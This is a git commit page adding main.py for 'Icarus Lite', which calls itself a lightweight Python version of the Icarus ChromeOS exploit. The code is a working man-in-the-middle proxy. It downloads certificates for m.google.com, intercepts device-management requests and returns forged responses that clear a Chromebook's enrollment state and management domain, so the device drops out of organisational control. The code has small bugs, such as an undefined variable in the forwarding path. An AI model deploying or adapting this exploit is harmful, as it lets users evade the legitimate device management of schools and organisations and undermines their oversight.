Create main.py
This commit is contained in:
parent
40a3ff4dc7
commit
75d8516278
320
main.py
Normal file
320
main.py
Normal file
@ -0,0 +1,320 @@
|
||||
"""
|
||||
Icarus Lite v1.0
|
||||
Written by cosmicdevv
|
||||
|
||||
Description:
|
||||
Icarus Lite is a simple and lightweight version of the Icarus ChromeOS exploit initially written in NodeJS by Writable/Unretained/MunyDev.
|
||||
|
||||
The goal of Icarus Lite is to simplify the codebase and make it easier to understand and modify. Icarus Lite is
|
||||
|
||||
How Icarus/Icarus Lite work:
|
||||
ill write later lol
|
||||
|
||||
"""
|
||||
|
||||
import os
|
||||
import time
|
||||
import socket
|
||||
import ssl
|
||||
import shutil
|
||||
import threading
|
||||
import select
|
||||
import re
|
||||
import http.server
|
||||
import urllib.request
|
||||
import urllib.parse
|
||||
from dmbackend import device_management_pb2
|
||||
|
||||
pInitial = 3001 # The port that MiniServers will start up from.
|
||||
sslCerts = {
|
||||
"m.google.com.key": "https://git.kxtz.dev/kxtzownsu/httpmitm/raw/branch/main/configs/m.google.com/public/google.com.key",
|
||||
"m.google.com.pem": "https://git.kxtz.dev/kxtzownsu/httpmitm/raw/branch/main/configs/m.google.com/public/google.com.pem"
|
||||
} # Stores names and links of certificates to download
|
||||
certPaths = {} # Stores paths of certificates on the local filesystem
|
||||
|
||||
# Custom function to print text with color to enhance user experience while reducing dependies (such as Colorama) that are needed
|
||||
def colorprint(text, color):
|
||||
if color == "blue":
|
||||
print(f"\033[34m{text}\033[0m")
|
||||
elif color == "green":
|
||||
print(f"\033[32m{text}\033[0m")
|
||||
elif color == "red":
|
||||
print(f"\033[31m{text}\033[0m")
|
||||
|
||||
# unlike normal icarus which calls other files and shit to create a miniserver, we can do it easily in icarus Lite!!!!!
|
||||
class MiniServerHandler(http.server.SimpleHTTPRequestHandler):
|
||||
def log_message(self, format, *args):
|
||||
pass # Since we have our own logging, we don't need the HTTP server to log requests it recieves
|
||||
|
||||
def do_GET(self):
|
||||
colorprint("GET request recieved, ignoring.\n\n", "blue")
|
||||
self.send_response(200)
|
||||
self.wfile.write(b"OK")
|
||||
|
||||
def do_POST(self):
|
||||
# Slightly rewritten part of dmbackend
|
||||
|
||||
# Get the body content of the request from the client
|
||||
body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
|
||||
# Create a dmr object
|
||||
dmr = device_management_pb2.DeviceManagementRequest()
|
||||
dmr.ParseFromString(body)
|
||||
# Declare status_code and resp which are used for the response later.
|
||||
status_code = 0
|
||||
resp = None
|
||||
# all the magic originally by writable
|
||||
if (dmr.HasField("device_state_retrieval_request")):
|
||||
print("intercepting")
|
||||
status_code = 200
|
||||
resp = device_management_pb2.DeviceManagementResponse()
|
||||
rr = resp.device_state_retrieval_response
|
||||
dv = device_management_pb2.DeviceInitialEnrollmentStateResponse()
|
||||
dv.Clear()
|
||||
dv = rr.initial_state_response
|
||||
dv.initial_enrollment_mode = 0
|
||||
dv.management_domain = ""
|
||||
dv.is_license_packaged_with_device = False
|
||||
dv.disabled_state.message = ""
|
||||
rr.restore_mode = 0
|
||||
rr.management_domain = ""
|
||||
else:
|
||||
req = urllib.request.Request("https://m.google.com/devicemanagement/data/api?" + urllib.parse.urlparse(self.path).query, data=data, headers=dict(self.headers), method="POST")
|
||||
with urllib.request.urlopen(req) as response:
|
||||
status_code = response.getcode()
|
||||
con = response.read().decode()
|
||||
resp = device_management_pb2.DeviceManagementResponse()
|
||||
resp.ParseFromString(con)
|
||||
# Send the response back to the client, which unenroll the device
|
||||
self.send_response(status_code)
|
||||
self.send_header("Content-Type", "application/x-protobuffer")
|
||||
self.send_header("Content-Length", str(len(resp.SerializeToString())))
|
||||
self.end_headers()
|
||||
self.wfile.write(resp.SerializeToString())
|
||||
|
||||
|
||||
class MiniServer:
|
||||
def __init__(self):
|
||||
# Create a mini HTTP/HTTPS server.
|
||||
global pInitial
|
||||
self.port = pInitial
|
||||
handler = MiniServerHandler
|
||||
handler.server = self
|
||||
# Keep trying to create the server in case some ports are already in use, in which case the code will increment the port and try again.
|
||||
while True:
|
||||
try:
|
||||
self.httpd = http.server.HTTPServer(("0.0.0.0", self.port), handler)
|
||||
break
|
||||
except OSError:
|
||||
pInitial += 1
|
||||
self.port = pInitial
|
||||
continue
|
||||
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
|
||||
context.load_cert_chain(certfile=certPaths["pem"], keyfile=certPaths["key"])
|
||||
self.httpd.socket = context.wrap_socket(self.httpd.socket, server_side=True)
|
||||
pInitial += 1
|
||||
threading.Thread(target=self.httpd.serve_forever).start() # Start the server in a separate thread so it doesn't block the main thread.
|
||||
|
||||
|
||||
def handle_client(client_socket, address):
|
||||
# Initial request buffer
|
||||
colorprint("// HANDLING REQUEST \\\\\n", "blue")
|
||||
host = None
|
||||
port = 0
|
||||
is_tls = False
|
||||
is_filtered = False
|
||||
request = b""
|
||||
|
||||
# Gets all the request data (we while loop this incase the request is larger than 1 packet, and the loop ends once the end of the request is reached)
|
||||
while b"\r\n\r\n" not in request:
|
||||
data = client_socket.recv(4096) # Recieve 1 packet with the buffer size of 4096 bytes
|
||||
request += data # Add the newly retrieved data to the stored request data
|
||||
|
||||
# Split and decode the request data
|
||||
request_line = request.split(b"\r\n")[0].decode("utf-8")
|
||||
if request_line.startswith("CONNECT"): # CONNECT means it's a TLS request
|
||||
is_tls = True
|
||||
_, target, _ = request_line.split(" ", 2)
|
||||
host, port = target.split(":", 1)
|
||||
port = int(port)
|
||||
else: # If CONNECT isn't in the request_line, it's not a TLS request, and we handle it differently
|
||||
is_tls = False
|
||||
method, path, _ = request_line.split(" ", 2)
|
||||
# Get the host from the request data
|
||||
for line in request.split(b"\r\n")[1:]:
|
||||
if line.startswith(b"Host: "):
|
||||
host = line[6:].decode("utf-8")
|
||||
break
|
||||
# If a host isn't found, the request is probably malformed
|
||||
if not host:
|
||||
client_socket.close()
|
||||
return
|
||||
# If the host specifies a port to use, we'll retrieve it.
|
||||
if ":" in host:
|
||||
host, port = host.split(":", 1)
|
||||
port = int(port) # Ensure the host is an integer and not a string
|
||||
else: # If no port is specified, we'll use the default port for a non-TLS request (which is 80)
|
||||
port = 80
|
||||
|
||||
# Check if the host is filtered
|
||||
if re.match(r"m\.google\.com", host):
|
||||
is_filtered = True
|
||||
|
||||
# Console logging
|
||||
colorprint("Server Address: " + str(host), "blue")
|
||||
colorprint("Is TLS (HTTPS) connection: " + str(is_tls), "green" if is_tls else "red")
|
||||
colorprint("Is filtered? " + str(is_filtered), "green" if is_filtered else "red")
|
||||
|
||||
# If it's filtered and it's a TLS request, we'll have to send the request to our own server so we can intercept it
|
||||
if is_filtered and is_tls:
|
||||
# Create a new MiniServer,
|
||||
miniserver = MiniServer()
|
||||
# Create a server socket to communicate with the Miniserver
|
||||
miniserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
miniserver_socket.connect(("127.0.0.1", miniserver.port))
|
||||
# Acknowledge the request, then pipe the client to the MiniServer
|
||||
client_socket.sendall(b"HTTP/1.1 200 Connection Established\r\n\r\n")
|
||||
try:
|
||||
tunnel_traffic(client_socket, miniserver_socket)
|
||||
except Exception as e:
|
||||
colorprint(f"ERROR: {e}\nThe client may have rejected the connection.", "red")
|
||||
colorprint("Have you ran the Icarus shim on the target Chromebook?", "blue")
|
||||
return
|
||||
# The below only runs if the host isn't filtered (or it is filtered but not a TLS request, in which case we won't intercept it)
|
||||
try:
|
||||
# Create a connection to the host server
|
||||
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
server_socket.connect((host, port))
|
||||
if is_tls:
|
||||
# If it's a TLS request, we'll acknowledge the request so the tunnel between the client and server can be established shortly
|
||||
client_socket.sendall(b"HTTP/1.1 200 Connection Established\r\n\r\n")
|
||||
else:
|
||||
# If it's not a TLS request, we'll forward all the data from the client to the server
|
||||
server_socket.sendall(request)
|
||||
# Same as .pipe() in NodeJS but we have to do it a bit differently.
|
||||
try:
|
||||
tunnel_traffic(client_socket, server_socket)
|
||||
except Exception as e:
|
||||
colorprint(f"ERROR: {e}\nUnknown failure tunneling traffic.", "red")
|
||||
except Exception as e:
|
||||
colorprint(f"Error connecting to {host}:{port} - {e}", "red")
|
||||
client_socket.close()
|
||||
return
|
||||
print("\n\n") # New lines for next request
|
||||
|
||||
def tunnel_traffic(client_socket, server_socket):
|
||||
# Because Python does not have a built-in .pipe() method like NodeJS, we have to do this manually.
|
||||
client_socket.setblocking(0)
|
||||
server_socket.setblocking(0)
|
||||
while True:
|
||||
readable, _, exceptional = select.select([client_socket, server_socket], [], [client_socket, server_socket], 60)
|
||||
if exceptional:
|
||||
break
|
||||
for sock in readable:
|
||||
peer_sock = server_socket if sock is client_socket else client_socket
|
||||
# normally we'd put a try catch exception here but i want it to raise an error when there is one
|
||||
data = sock.recv(4096)
|
||||
if not data:
|
||||
# Socket closed
|
||||
return
|
||||
peer_sock.sendall(data)
|
||||
client_socket.close()
|
||||
server_socket.close()
|
||||
|
||||
colorprint("Icarus Lite v1.0", "blue")
|
||||
colorprint("Written by cosmicdevv", "blue")
|
||||
colorprint("Checking installation...", "blue")
|
||||
# Check if the Icarus folder exists
|
||||
firstTime = False
|
||||
if not os.path.exists("Icarus Lite"):
|
||||
firstTime = True
|
||||
colorprint("! WARNING !\nIcarus Lite is not set up in the local directory. Do you want to automatically set up? (Y/N)", "blue")
|
||||
# Ask the user if they want to create the Icarus folder, loop to ensure valid input
|
||||
while True:
|
||||
choice = input().lower()
|
||||
if choice in ["y", "yes"]:
|
||||
break
|
||||
elif choice in ["n", "no"]:
|
||||
colorprint("Icarus Lite will not set up due to user choice.", "red")
|
||||
exit()
|
||||
# If they selected yes, create necessary folders
|
||||
colorprint("Creating install folder...", "blue")
|
||||
os.mkdir("Icarus Lite")
|
||||
colorprint("Creating certificate folder...", "blue")
|
||||
os.mkdir("Icarus Lite/autocerts")
|
||||
colorprint("Creating manual certificate folder...", "blue")
|
||||
os.mkdir("Icarus Lite/manualcerts")
|
||||
colorprint("Creating dmbackend folder...", "blue")
|
||||
os.mkdir("Icarus Lite/dmbackend")
|
||||
colorprint("Downloading latest Icarus SSL certificates...", "blue")
|
||||
success = True # If a download fails, this gets set to false
|
||||
# Loop through all the necessary SSL certificates, where their filename is the key and the download url is the value
|
||||
for sslCert in sslCerts:
|
||||
try:
|
||||
# Try to download the certificate from the url and place it in the autocerts folder
|
||||
urllib.request.urlretrieve(sslCerts[sslCert], f"Icarus Lite/autocerts/{sslCert}")
|
||||
if firstTime:
|
||||
# Create a backup copy of the certificate in the manualcerts folder
|
||||
shutil.copy(f"Icarus Lite/autocerts/{sslCert}", f"Icarus Lite/manualcerts/{sslCert}")
|
||||
colorprint(f"Latest '{sslCert}' downloaded.", "green")
|
||||
except Exception as e:
|
||||
# If the download fails
|
||||
success = False
|
||||
colorprint(f"'{sslCert}' failed to download.", "red")
|
||||
# If not all downloads were successful, run this
|
||||
if not success:
|
||||
colorprint("One or more certificates could not be downloaded. Checking ability to run...", "red")
|
||||
# Check if the required certs were downloaded (in case we put other files in the download list for some reason)
|
||||
if not os.path.exists("Icarus Lite/autocerts/m.google.com.key") or not os.path.exists(f"Icarus Lite/autocerts/m.google.com.pem"):
|
||||
colorprint("Icarus Lite is unable to run from auto-downloaded certificates.", "blue")
|
||||
messageDisplayed = False
|
||||
# Loop until certificates are manually added to the manualcerts folder (we use a different folder for manual certs so if a user puts certs in a folder, they aren't overwritten by the autodownloads unless it's a fresh setup)
|
||||
while True:
|
||||
if os.path.exists("Icarus Lite/manualcerts/m.google.com.key") and os.path.exists(f"Icarus Lite/manualcerts/m.google.com.key"):
|
||||
colorprint("Manual certificates found. Using manual certificates for Icarus Lite.", "green")
|
||||
# Set the certificate paths to the manualcerts path
|
||||
certPaths["key"] = "Icarus Lite/manualcerts/m.google.com.key"
|
||||
certPaths["pem"] = "Icarus Lite/manualcerts/m.google.com.pem"
|
||||
break
|
||||
# If the user doesn't have certs in manualcerts on first check, prompt them to put them in.
|
||||
if messageDisplayed == False:
|
||||
colorprint("Please manually download the certificates and place them in:\nIcarus Lite/manualcerts/\nWaiting for certificates...", "blue")
|
||||
messageDisplayed = True # Ensure the message isn't displayed every loop iteration
|
||||
# small delay
|
||||
time.sleep(1)
|
||||
else:
|
||||
# If the required certs were auto-downloaded, we'll use them
|
||||
certPaths["key"] = "Icarus Lite/autocerts/m.google.com.key"
|
||||
certPaths["pem"] = "Icarus Lite/autocerts/m.google.com.pem"
|
||||
else:
|
||||
# If all downloads were successful, we'll use the downloaded certs
|
||||
certPaths["key"] = "Icarus Lite/autocerts/m.google.com.key"
|
||||
certPaths["pem"] = "Icarus Lite/autocerts/m.google.com.pem"
|
||||
|
||||
port = 8080
|
||||
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
proxy_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
proxy_socket.bind(("0.0.0.0", port))
|
||||
proxy_socket.listen(100)
|
||||
|
||||
# Get the local IP for the user
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
s.connect(("8.8.8.8", 1))
|
||||
local_ip = s.getsockname()[0]
|
||||
s.close()
|
||||
|
||||
# aaaaaaaaaaaaaaaaaaaaaa
|
||||
print("\n\n\n")
|
||||
colorprint(f"Icarus Lite is running on: {local_ip}:{port}", "blue")
|
||||
while True:
|
||||
try:
|
||||
client_socket, client_address = proxy_socket.accept()
|
||||
client_thread = threading.Thread(target=handle_client, args=(client_socket, client_address))
|
||||
client_thread.daemon = True
|
||||
client_thread.start()
|
||||
except KeyboardInterrupt:
|
||||
print("Icarus Lite is shutting down...")
|
||||
proxy_socket.close()
|
||||
break
|
||||
except Exception as e:
|
||||
print(f"Error accepting connection: {e}")
|
||||
proxy_socket.close()
|
Loading…
x
Reference in New Issue
Block a user